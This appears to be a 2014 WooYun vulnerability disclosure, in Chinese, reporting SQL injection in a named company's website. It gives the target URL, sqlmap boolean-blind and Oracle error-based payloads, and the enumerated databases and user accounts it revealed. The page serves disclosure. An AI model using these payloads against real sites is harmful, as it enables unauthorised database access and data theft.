漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-09-25: 细节已通知厂商并且等待厂商处理中
2014-09-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
0.0
详细说明:
高阳通联集团
www.hisunsray.com
http://www.hisunsray.com/news/comp_view.asp?fileid=10485729&typeId=2550
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: fileid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fileid=10485729 AND 6456=6456&typeId=2550
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: fileid=10485729 AND 7629=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(104)||CHR(113)||CHR(102)||CHR(58)||(SELECT (CASE WHEN (7629=7629) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(112)||CHR(118)||CHR(105)||CHR(58)||CHR(62))) FROM DUAL)&typeId=2550
---
available databases [8]:
[*] CTXSYS
[*] EXFSYS
[*] HISUNOA
[*] MDSYS
[*] OLAPSYS
[*] SPWEB
[*] SYS
[*] SYSTEM
database management system users [29]:
[*] ANONYMOUS
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] HISUNOA
[*] HISUNWWW
[*] IMS
[*] INFORM
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PEOA
[*] PERFSTAT
[*] SI_INFORMTN_SCHEMA
[*] SPWEB
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] YKSOFT
OK、
漏洞证明:
如上
修复方案:
过滤
版权声明:转载请注明来源 爱上平顶山@乌云
>
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-09-30 15:20
厂商回复:
最新状态:
暂无